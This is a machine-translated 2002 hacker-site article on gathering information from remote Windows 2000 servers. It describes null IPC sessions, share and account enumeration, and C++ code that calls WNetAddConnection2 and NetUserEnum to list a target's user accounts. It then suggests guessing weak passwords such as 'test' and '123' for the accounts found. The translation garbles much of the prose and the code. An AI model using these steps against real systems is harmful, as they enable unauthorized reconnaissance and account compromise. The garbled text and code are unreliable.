Gain far-end Windows 2,000 servers systems information |http://www.cshu.net




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  |  Hacker file>>invasion analysis>> gain far-end Windows 2,000 
                  servers systems information  Printing

            Gain far-end Windows 2,000 servers systems information
            Www.cshu.net  2002-11-8  fog rain village 

              Thin pondered, Windows 2,000 provides the function really was too 
              formidable, this has greatly facilitated the Admin supervisory 
              work, but the advantageses and disadvantageses always all were 
              coexist, was precisely because Windows 2,000 provided the 
              formidable function, let you slightly not pay attention, the 
              system on was patronized by the hackers, the system information is 
              exposed, was the extremely fearful matter, this meant the hacker 
              has already kept abreast of a your server half situation, once had 
              discovered the system loophole, meant next step invaded start. 
              Cites a simple example: If your server has accidentally operated a 
              shared folder, the hacker tried to find solution to gain your 
              server information, discovered this shared folder permission 
              visit, ha-ha, was very possible, does by him Pub any with... ... 
              Said the half of the day, what type long-distance can gain the 
              system information? Very many are very many, not incomplete said 
              the quite essential some information: 
              Server Name: Server name 
              Server Comment: : The correlation explanation information, very 
              many managers like in here inscribing sensitive information:) 
              Server Type: The server type, through this, the hackers may judge 
              the goal server is is in under any environment, for instance may 
              judge: A LAN Manager workstation, A LAN Manager server, Windows 
              NT/Windows 2,000 workstation or server, Windows NT/Windows 2,000 
              server that is not a domain controller, Server running a browser 
              service as backup, Server running the master browser service 
              Major_version: Inor_version: These two respectively were the 
              server big edition number and the small edition number, the hacker 
              obtained the operating system edition information through this, 
              for instance, the big edition number was 5, the small edition 
              number was 0, selected the explanation is windows 2,000 servers, 
              but next step was searches the windows 2,000 security loopholes 
              Current date, current time is: The server with the time, through 
              this, was allowed to judge the time zone on the other day which 
              the server was at, good grasped the seepage the time 
              Session: Obtains the current server the conversation to connect 
              the IP address, this function quite has been widespread, may act 
              according to the actual situation, nimble utilization 
              Share Enum: This is very important information, he demonstrated on 
              the server all shared folder, including concealment sharing, once 
              discovered might the use sharing information, the hacker only need 
              simply inputs \\ip\share in the browser, was allowed to visit the 
              goal main engine the sharing information, was such dangerous! 
              UserEnum: This thing has been more fearful, has all brought 
              including the server account number information, lands the 
              successful number of times including the user, the defeat number 
              of times, the account number period of revolution, lands the 
              script way, the password becomes effective the time... ... These 
              connection series managers all blind oh! In addition also has some 
              information to be able to expose, for instance: User, user 
              jurisdiction, user explanation information, whether the account 
              number is durable... ... This very possibly creates the weak 
              password user easily to explain, the brand new system manager if 
              keeps user:test, the password:123 and so on account number in 
              inside, estimated the server could not preserve. 
              LocalGroupEnum: Enumerates the local group, ha-ha ~ ~ 
              In addition also has UseEnum, FileEnum, ScheduleJobEnum... ... Too 
              have been really many ~ 
              Under, said how most important part these information can gain? 
              Turns on your winnt/system32 this folder, looks looked, is not has 
              to be called netapi32.dll the document? From the filename, we may 
              know that, this is and the network function correlation dynamic 
              connection storehouse, this is the thing which we needs to look 
              oh! Above obtains the information, actually completely is realizes 
              through this DLL document. Corresponded to this DLL document, 
              Windows 2,000 provides a group of related API function to 
              transfer, installs Platform the SDK this development tool bag, 
              then please opened your MSDN, the essential character which the 
              input had to search "Network Management", then chose Network 
              Management Reference - >Network Management Functions you to be 
              able to see to a group the API function which to Net began, 
              correctly utilized this group of function, was allowed to gain 
              far-end the server information, the function usage was a little 
              complex, below cited a simple example: 
              If has windows 2,000 goals main engines, its IP address is: 
              192.168.10.111, we now prepare to gain his account number 
              information, first we establish a IP spatial conversation 
              connection: 
              Established the spatial conversation and the separation 
              conversation mainly uses two functions: 
              DWORD WNetAddConnection2 (LPNETRESOURCE lpNetResource, LPCTSTR 
              lpPassword, LPCTSTR lpUsername, DWORD dwFlags); 
              The above function establishes a conversation connection, LPCTSTR 
              lpPassword, LPCTSTR lpUsername respectively is the user password 
              and user, must want to establish the spatial conversation, then 
              certainly must set spatially these two items. 
              DWORD WNetCancelConnection2 (LPCTSTR lpName, DWORD dwFlags, BOOL 
              fForce); 
              The WNetCancelConnection2 function then with WNetAddConnection2 is 
              opposite, after gain user information, in order to guarantee the 
              security, the hacker can use between his rapid separation and the 
              server conversation. 
              I had already written it a kind, this was a kind of part of 
              function: 
              BOOL CAhFunc::CreateLine (char * str) { 
              NETRESOURCE netr; 
              TCHAR netBuf [ MAX_PATH ] = {0}; 
              Memset (&netr, 0, sizeof (NETRESOURCE)); 
              // above, all is some initialization information 
              Wsprintf (netBuf, "\\\\%s\\ip", str); 
              A // front line, has produced line of characters strings 
              "\\xxx.xxx.xxx.xxx\ip" 
              Netr.dwScope = RESOURCE_GLOBALNET; 
              Netr.dwType = RESOURCETYPE_ANY; 
              Netr.lpLocalName = ""; 
              Netr.lpRemoteName = netBuf; 
              Netr.lpProvider = NULL; 
              If (WNetAddConnection2 (&netr, "", "", NULL) == NO_ERROR) 
              //ok! Stopped, is simple has established a IP connection with 
              above function, actually he was has simulated under windows 
              NT/2000 this kind of order: Net use \\xxx.xxx.xxx.xxx\ip "" /user: 
              "" Concrete net the use usage, everybody has a look help. 
              Return TRUE; 
              Return FALSE; 
              } 
              Under is separates the conversation the method 
              BOOL CAhFunc::DestoryLine (LPTSTR str) { 
              TCHAR netNB [ MAX_PATH ] = {0}; 
              Wsprintf (netNB, "\\\\%s", str); 
              If (WNetCancelConnection2 (netNB, CONNECT_UPDATE_PROFILE, TRUE) == 
              NO_ERROR) 
              Return TRUE; 
              Return FALSE; 
              } 
              Same, also was simulates this strip to order net use 
              \\xxx.xxx.xxx.xxx /DEL 
              Just said, we must take were far-end on the server account number 
              information, opens MSDN, the input essential character: 
              NetUserEnum, has seen? You may find this function NET_API_STATUS 
              NetUserEnum (LPCWSTR servername, DWORD level, DWORD filter, LPBYTE 
              *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD 
              totalentries, LPDWORD resume_handle); 
              A big string parameter, looks like very fearfully is? :) No 
              problem, we have come one by one: 
              LPCWSTR servername: Pays attention to this, it but requests the 
              LPCWSTR type the data, in other words, requested with the Unicode 
              character, if you directly evaluated for it, was definitely not 
              good, had to circle the spot to bend, had this kind of function 
              MultiByteToWideChar (UINT CodePage, DWORD dwFlags, LPCSTR 
              lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int 
              cchWideChar); 
              This function function is uses for the single byte to transform 
              into a pair of byte 
              DWORD level: Uses for to assign the operation rank, the different 
              user visit jurisdiction, this rank is different. According to the 
              different rank, may gain the different rank the system information 
              below, according to the MSDN on description, has the rank to be 
              possible to supply the choice: 
              0 
              In this rank, may gain the user account name, it uses USER_INFO_0 
              this structure to save, in ipc spatial connection time is may use 
              1 
              Return detailed information about user accounts. The bufptr 
              parameter points to an array of USER_INFO_1 structures. 
              2 
              Return level one information and additional attributes about user 
              accounts. The bufptr parameter points to an array of USER_INFO_2 
              structures. 
              3 
              Return level two information and additional attributes about user 
              accounts. This level is valid only on Windows NT/Windows 2,000 
              servers. The bufptr parameter points to an array of USER_INFO_3 
              structures. Note that on Whistler and later, it is recommended 
              that you use USER_INFO_4 instead. 
              4 
              Whistler: Return level two information and additional attributes 
              about user accounts. This level is valid only on Windows 
              NT/Windows 2,000 servers. The bufptr parameter points to an array 
              of USER_INFO_4 structures. 
              10 
              Return user and account names and comments. The bufptr parameter 
              points to an array of USER_INFO_10 structures. 
              11 
              Return detailed information about user accounts. The bufptr 
              parameter points to an array of USER_INFO_11 structures. 
              20 
              Return the user's name and identifier and various account 
              attributes. The bufptr parameter points to an array of 
              USER_INFO_20 structures. Note that on Whistler and later, it is 
              recommended that you use USER_INFO_23 instead. 
              23 
              Whistler: Return the user's name and identifier and various 
              account attributes. The bufptr parameter points to an array of 
              USER_INFO_23 structures. 

              Establishes the spatial conversation with the main engine, already 
              was allowed to use besides 4 and 23 all ranks, 4 and 23 was 
              retained, at present 2,000 does not support these two ranks in 
              windows, he was edition remains for behind Windows the XP. Good, 
              we had the above information, started to write the procedure: 
              In order to exempt disliking of the cheating payment for published 
              piece, we give an example the simplest level 0 ranks operations, 
              in this rank, you only can take the system the account number 
              name, but this said regarding the hacker, already enough J! 
              Char netNB [ MAX_PATH ] = {0}; 
              Sprintf (netNB, "\\\\%s", str); 
              Char lpwStr [ MAX_PATH ] = {0}; 
              MultiByteToWideChar (CP_ACP, 0, netNB, -1, (unsigned short *) 
              lpwStr, MAX_PATH); 
              // ha-ha, looked above line, transformed the single byte to a pair 
              of byte 
              LPUSER_INFO_0 pBuf_0 = NULL; 
              LPUSER_INFO_0 pTmpBuf_0; 
              DWORD dwPrefMaxLen = -1; 
              DWORD dwEntriesRead = 0; 
              DWORD dwTotalEntries = 0; 
              DWORD dwResumeHandle = 0; 
              DWORD i; 
              DWORD dwTotalCount = 0; 
              NET_API_STATUS nStatus; 
              LPTSTR pszServerName = NULL; 
              NStatus = NetUserEnum ((unsigned short *) lpwStr, 
              DwLevel, 
              FILTER_NORMAL_ACCOUNT, // global users 
              (LPBYTE*) &pBuf_0, 
              DwPrefMaxLen, 
              &dwEntriesRead, 
              &dwTotalEntries, 
              &dwResumeHandle); 
              // If the call succeeds, 
              If ((nStatus == NERR_Success) || (nStatus == ERROR_MORE_DATA)) 
              { 
              If ((pTmpBuf_0 = pBuf_0)! = NULL) 
              { 
              // Loop through the entries. 
              For (i = 0; (i < dwEntriesRead); I++) 
              { 
              If (pTmpBuf_0 == NULL) 
              { 
              Fprintf (stderr, "An access violation has occurred\n"); 
              Break; 
              } 
              // Print the name of the user account. 
              Wprintf (L "username:%s\n", pTmpBuf_0->usri0_name); 
              // attention has a look here, is the wide byte output, certainly 
              you also may use printf ("username:%S\n", pTmpBuf_0->usri0_name); 
              The method output, %S expressed the width byte, %s is the single 
              byte, the output information, is on the long-distance main engine 
              user account 

              PTmpBuf_0++; 
              DwTotalCount++; 
              } 
              } 
              } 
              Else 
              Printf ("A system error has occurred\n"); 
              } while (nStatus == ERROR_MORE_DATA); // end do 
              If you want, but also may design the weak password the survey 
              rule, for instance if has user named test, then may attempt the 
              password is "", "test", "test123", "t", "123"... ... This rule 
              more complex success ratio is higher oh! Everybody is familiar 
              with X-Scan is gains the long-distance main engine information 
              with this method, the password survey also is this method 
              realization.


              Original author: . 
              Origin: Ttian 
              Altogether has 274 readers to read this article 

              [Tells friend] 
            Previous article:Oracle9iAS Web Cache long-distance refuses to serve 
            the attack loophole 

            Next article:Suffers injury PC when attacks the platform Roron worm 
            harm is enormous 

            - this week popular article - related article 
            The nc.exe high-level skill application compiles
            QQ attack code
            Hacker technology (use of the DEBUG loophole)
            Invades the hypothesized main engine the simple plan
            The local area network winds viral invasion principle and its guard 
            method
            The security receives in OutLook not the security appendix
            NT loophole summary and use



      CSHU 
